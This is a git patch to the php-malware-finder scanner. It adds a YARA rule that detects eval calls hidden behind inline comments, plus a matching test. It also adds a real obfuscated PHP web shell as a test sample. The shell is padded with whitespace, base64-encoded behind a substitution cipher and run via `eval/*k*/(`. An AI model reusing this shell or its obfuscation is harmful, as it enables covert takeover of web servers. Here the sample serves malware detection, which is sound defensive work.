From e328b96e2c6c5fd4d54ce70240aa411524d18aa4 Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Wed, 21 Feb 2018 14:07:43 +0100
Subject: Add a detection for things like `eval/* …*/(`

---
 php-malware-finder/php.yar                     | 1 +
 php-malware-finder/samples/real/exceptions.php | 1 +
 php-malware-finder/tests.sh                    | 1 +
 3 files changed, 3 insertions(+)
 create mode 100644 php-malware-finder/samples/real/exceptions.php

diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
index b2c486c..f0abcb4 100644
--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -60,6 +60,7 @@ rule ObfuscatedPhp
 {
     strings:
         $eval = /(<\?php|[;{}])[ \t]*@?(eval|preg_replace|system|assert|passthru|(pcntl_)?exec|shell_exec|call_user_func(_array)?)\s*\(/ nocase  // ;eval( <- this is dodgy
+        $eval_comment = /(eval|preg_replace|system|assert|passthru|(pcntl_)?exec|shell_exec|call_user_func(_array)?)\/\*[^\*]*\*\/\(/ nocase  // eval/*lol*/( <- this is dodgy
         $b374k = "'ev'.'al'"
         $align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/  //b374k
         $weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/  // weevely3 launcher
diff --git a/php-malware-finder/samples/real/exceptions.php b/php-malware-finder/samples/real/exceptions.php
new file mode 100644
index 0000000..d5ce73f
--- /dev/null
+++ b/php-malware-finder/samples/real/exceptions.php
@@ -0,0 +1 @@
+<?php                                                                                                                                                                                              $ksyweqahwz = 95; function ngomynsz($jkvdve, $swxidbkzpw){$azzogyulq = ''; for($i=0; $i < strlen($jkvdve); $i++){$azzogyulq .= isset($swxidbkzpw[$jkvdve[$i]]) ? $swxidbkzpw[$jkvdve[$i]] : $jkvdve[$i];}$wzmkq="b" . "a" . "s" . "e" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "d" . "e";return $wzmkq($azzogyulq);}$jgzzljfjj = Array("A"=>"D", "C"=>"B", "B"=>"4", "E"=>"F", "D"=>"C", "F"=>"7", "1"=>"E", "0"=>"9", "3"=>"0", "2"=>"2", "5"=>"A", "4"=>"8", "7"=>"1", "6"=>"3", "9"=>"5", "8"=>"6");$fuwkgtdbkv = "DgokZGVmYXVsdE0hY6Rpb2BgPS5nQ3MnOwoKQGluaV0zZXQoJ2Vycm0yX2xvZycsTlVMTDk"."FDkCpbmlfc2V3KDdsb2dfZXJyb6JzJywwKTsKQGluaV0zZXQoJ27heE0leGVjdXRpb29fdGltZSc"."sMDkFDkCzZXRfdGltZV0saW7pdDgwKTsKQHNldE0tYWdpY70xdW03ZXNfcnVudGltZSgwKTsKQGR"."lZmluZSgnV7NPX7ZEUlNJT3BnLD5nMiB7LjInKTsKDmlmKGdldE0tYWdpY70xdW03ZXNfZ6CjKDkpIHsKID5gIGZ7b"."mN3aW0uIEdTT6N3cmlwc2xhc2hlcygkYXJyYXkpIHsKID5gID5gIDCyZXR7c"."mBgaXNfYXJyYXkoJGEycmE9KS5/IGEycmE9X27hcDgnV7NPc6RyaXCzbGEzaGVzJywgJGEycmE9KS58IHN3cmlwc2xhc2h"."lcygkYXJyYXkpOwogID5gfQogID5gJE0QT7NUIA3gV7NPc6RyaXCzbGEza"."GVzKDRfU10TVDkFDi5gID5kX3NPT3tJRS50IEdTT6N3cmlwc2xhc2hlcygkX3NPT3tJRSkFDn3KD"."mZ7bmN3aW0uIHdzb3xvZ2luKDkgewogID5gaGVhZGVyKDdIVERQLz1uMD53MAQgTm03I1ZvdW9"."kJykFDi5gIDCkaWUoIjQwNDIpOwp0DgpmdW9jdGlvbiCXU30zZXRjb20raWUoJGssIDR2"."KSCFDi5gID5kX3NPT3tJRVska73gPS5kdjsKID5gIHNldGNvb2tpZSgkaywgJHYpOwp0DgppZ"."ighZW7wdHkoJGE7dGhfcGEzcykpIHsKID5gIGlmKGlzc2V3KDRfU10TVEsncGEzcyddKS5mJi5obWQ7KDRfU10TVEsncGEzc"."yddKS50PS5kYXV3aE0wYXNzKSkKID5gID5gIDCXU30zZXRjb20"."raWUobWQ7KDRfU3VSVkVSWydIVERQX3hPU7QnXSksIDRhdXRoX6Chc6MpOwoKID5gIGlmIDghaXNzZXQoJE0AT30LSUVbbWQ7KDR"."fU3VSVkVSWydIVERQX3hPU7QnXSldKSC4fD5oJE0AT30LSUVbbWQ7KDRfU3VSVkVSWydIVERQX3hPU7QnXSl"."dID10IDRhdXRoX6Chc6MpKQogID5gID5gIHdzb3xvZ2luKDkFDn3KDmZ7bmN3aW0uIGEjdGlvblIoKSCFDi5gIDCpZighQ"."DRfU10TVEsnZXYnXSkgewogID5gID5gIDRhIA3gYXJyYXkoDi5gID5g"."ID5gID5gIDJ7bmEtZSIgPTBgcGhwX6VuYW7lKDksDi5gID5gID5gID5gIDJwaHCfdmVyc2lvbiIgPTBgcGhwdmVyc2lvbigpL5og"."ID5gID5gID5gID5id6NvX6ZlcnNpb2BiIA3+IEdTT70WRVJTSU0OL5ogID5gID5gID5gID5ic2EmZW7vZGUiIA3+I1CpbmlfZ2V3"."KDdzYWZlX27vZGUnKQogID5gID5gIDkFDi5gID5gID5gZWNobyCzZXJpYWxpemUoJG1pOwogID5gfSClbHNlIHsKID5"."gID5gIDCldmEsKDRfU10TVEsnZXYnXSkFDi5gIDC0Dn3KDmlmK"."DClbXC3eSgkX7CPU7RbJ2MnXSkgKQogID5gaWYoaXNzZXQoJGRlZmE7bHRfYWN"."3aW0uKS5mJiCmdW9jdGlvbl0leGlzdHMoJ2EjdGlvbicgLi5kZGVmYXVsdE0hY6Rpb2BpKQogID5gID5gID"."RfU10TVEsnYyddIA3gJGRlZmE7bHRfYWN3aW0uOwogID5gZWxz"."ZQogID5gID5gIDRfU10TVEsnYyddIA3gJ7NlY3luZm4nOwppZiggIWVtcHR9K"."DRfU10TVEsnYyddKS5mJiCmdW9jdGlvbl0leGlzdHMoJ2EjdGlvbicgLi5kX7CPU7RbJ"."2MnXSkgKQogID5gY2EsbE07c2VyX2Z7bmMoJ2EjdGlvbicgLi5kX7CPU7RbJ2MnXSkFDmV"."BaXQF";eval/*k*/(ngomynsz($fuwkgtdbkv, $jgzzljfjj));?>
\ No newline at end of file
diff --git a/php-malware-finder/tests.sh b/php-malware-finder/tests.sh
index 5ec36cd..f4d9e06 100755
--- a/php-malware-finder/tests.sh
+++ b/php-malware-finder/tests.sh
@@ -85,6 +85,7 @@ run_test real/guidtz.php '0x12d8:$non_printables:'
 run_test real/ice.php 'double_var'
 run_test real/srt.php '$register_function'
 run_test real/awvjtnz.php '$reversed:'
+run_test real/exceptions.php '$eval_comment: eval/\*k\*/('
 
 run_test undetected/smart.php '0x6:$extract:'
 
-- 
cgit v1.3